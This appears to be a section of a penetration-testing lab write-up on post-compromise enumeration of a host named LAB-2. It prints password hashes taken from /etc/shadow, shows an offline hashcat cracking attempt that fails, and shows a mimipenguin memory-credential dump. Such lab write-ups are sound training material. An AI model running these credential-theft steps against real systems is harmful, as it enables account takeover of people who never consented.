Post Compromise Enumeration
Checking the system as the root account after compromising it
/etc/shadow
root@LAB-2:/# cat /etc/shadow
root:$6$n5REEVlM$nYgdHK6CtQp3vbyZw2.lMaeUANVM75JmlRncD6qnObUetFP8SG2cc8XW/1enA1oUxXS39H17Cz8./En8sNQNe.:19979:0:99999:7:::
daemon:*:19979:0:99999:7:::
bin:*:19979:0:99999:7:::
sys:*:19979:0:99999:7:::
sync:*:19979:0:99999:7:::
games:*:19979:0:99999:7:::
man:*:19979:0:99999:7:::
lp:*:19979:0:99999:7:::
mail:*:19979:0:99999:7:::
news:*:19979:0:99999:7:::
uucp:*:19979:0:99999:7:::
proxy:*:19979:0:99999:7:::
www-data:*:19979:0:99999:7:::
backup:*:19979:0:99999:7:::
list:*:19979:0:99999:7:::
irc:*:19979:0:99999:7:::
gnats:*:19979:0:99999:7:::
nobody:*:19979:0:99999:7:::
systemd-network:*:19979:0:99999:7:::
systemd-resolve:*:19979:0:99999:7:::
syslog:*:19979:0:99999:7:::
messagebus:*:19979:0:99999:7:::
_apt:*:19979:0:99999:7:::
uuidd:*:19979:0:99999:7:::
sshd:*:19979:0:99999:7:::
wao:$6$ZENNwHYt$DhiPYWPPBP/2sxfUusrx/5x6.8b5qI4gdJde9NDbV.8kTtxTdxvEW5rb5wG9qudc82aX01AOILA2iNoZYEilE/:19982:0:99999:7:::
steven:$6$W14mH6Yy$.qJ3F3FwQ5oVgBiYdCLBSQn8v.SbJ3MDEoTZ/0OhpamOhUKH/hgTZOyuoxcZpwiGtqLYy5PTz1zL6GY7vWGF8/:19979:0:99999:7:::
emma:$6$2gWMCP4b$pzjWdquZSg80UdO2RylTycDchjgdlznxGHhGdKafgyaUgjVVLwsgjbirtNkIzvDCBk5ixquxiba0IFwX6bsa9.:19980:0:99999:7:::Grabbing the credential hashes in the /etc/shadow file
Password Cracking (Failed)
PS C:\Users\tacticalgator\Tools\hashcat-6.2.6> .\hashcat.exe -a 0 -m 1800 .\hashes.txt .\rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 4 digests; 4 unique digests, 4 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Uses-64-Bit
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Oct 29 11:23:01 2024 (15 mins, 33 secs)
Time.Estimated...: Tue Oct 29 11:38:34 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 60348 H/s (0.91ms) @ Accel:2048 Loops:32 Thr:32 Vec:1
Speed.#3.........: 1205 H/s (1.08ms) @ Accel:512 Loops:8 Thr:16 Vec:1
Speed.#*.........: 61553 H/s
Recovered........: 0/4 (0.00%) Digests (total), 0/4 (0.00%) Digests (new), 0/4 (0.00%) Salts
Progress.........: 57377540/57377540 (100.00%)
Rejected.........: 0/57377540 (0.00%)
Restore.Point....: 14342516/14344385 (99.99%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Restore.Sub.#3...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121313233617364] -> $HEX[042a0337c2a156616d6f732103]
Candidates.#3....: !7/24/08! -> !18593"
Hardware.Mon.#1..: Temp: 59c Util: 0% Core: 780MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A
Started: Tue Oct 29 11:22:18 2024
Stopped: Tue Oct 29 11:38:35 2024hashcat was unable to crack the password hashes
Home
root@LAB-2:/home# ll *
emma:
total 28
drwxr-xr-x 4 emma emma 4096 Sep 14 03:46 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:46 .bash_history -> /dev/null
-rw-r--r-- 1 emma emma 220 Sep 14 03:44 .bash_logout
-rw-r--r-- 1 emma emma 3771 Sep 14 03:44 .bashrc
drwx------ 2 emma emma 4096 Sep 14 03:45 .cache/
drwx------ 3 emma emma 4096 Sep 14 03:45 .gnupg/
-rw-r--r-- 1 emma emma 807 Sep 14 03:44 .profile
-rw-r--r-- 1 emma emma 0 Sep 14 03:45 .sudo_as_admin_successful
steven:
total 20
drwxr-xr-x 2 steven steven 4096 Sep 14 03:47 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:47 .bash_history -> /dev/null
-rw-r--r-- 1 steven steven 220 Sep 13 11:09 .bash_logout
-rw-r--r-- 1 steven steven 3771 Sep 13 11:09 .bashrc
-rw-r--r-- 1 steven steven 807 Sep 13 11:09 .profile
wao:
total 52
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:48 .bash_history -> /dev/null
-rw-r--r-- 1 wao wao 220 Sep 13 11:08 .bash_logout
-rw-r--r-- 1 wao wao 3771 Sep 13 11:08 .bashrc
drwx------ 2 wao wao 4096 Sep 14 03:55 .cache/
drwx------ 3 wao wao 4096 Sep 14 07:21 .config/
drwxrwxr-x 2 wao wao 4096 Sep 14 06:41 Desktop/
drwxrwxr-x 2 wao wao 4096 Sep 14 06:42 Documents/
drwxrwxr-x 9 wao wao 4096 Sep 14 03:55 Downloads/
drwx------ 3 wao wao 4096 Sep 14 03:55 .gnupg/
drwxrwxr-x 3 wao wao 4096 Sep 14 07:32 .local/
-rw-r--r-- 1 wao wao 807 Sep 13 11:08 .profile
-rw-r--r-- 1 root root 66 Oct 21 17:09 .selected_editor
-rw-r--r-- 1 wao wao 0 Sep 14 03:58 .sudo_as_admin_successfulThe wao user’s home directory appears to be most interesting
wao
root@LAB-2:/home/wao# ll *
Desktop:
total 8
drwxrwxr-x 2 wao wao 4096 Sep 14 06:41 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
Documents:
total 8
drwxrwxr-x 2 wao wao 4096 Sep 14 06:42 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
Downloads:
total 60
drwxrwxr-x 9 wao wao 4096 Sep 14 03:55 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 CA/
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 gunicorn-test/
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 nginx/
-rwxrwxr-x 1 wao wao 22616 Sep 14 03:55 proto-features.py*
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 test/
drwxrwxr-x 3 wao wao 4096 Sep 14 03:55 University-Linux/
drwxrwxr-x 5 wao wao 4096 Sep 14 03:55 University-Prototype-23/
drwxrwxr-x 3 wao wao 4096 Sep 14 03:55 University-Windows/The Downloads directory contains files and directories relevant to the target web application
Upon a closer examination, nothing notable found
Cron
root@LAB-2:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
0 * * * * /usr/bin/pkill -u $(who | awk '{print $1}' | sort | uniq)N/A
Memory Dump
root@LAB-2:/var/tmp# ./mimipenguin
[+] Searching: [SYSTEM - SSH] (sshd:)N/A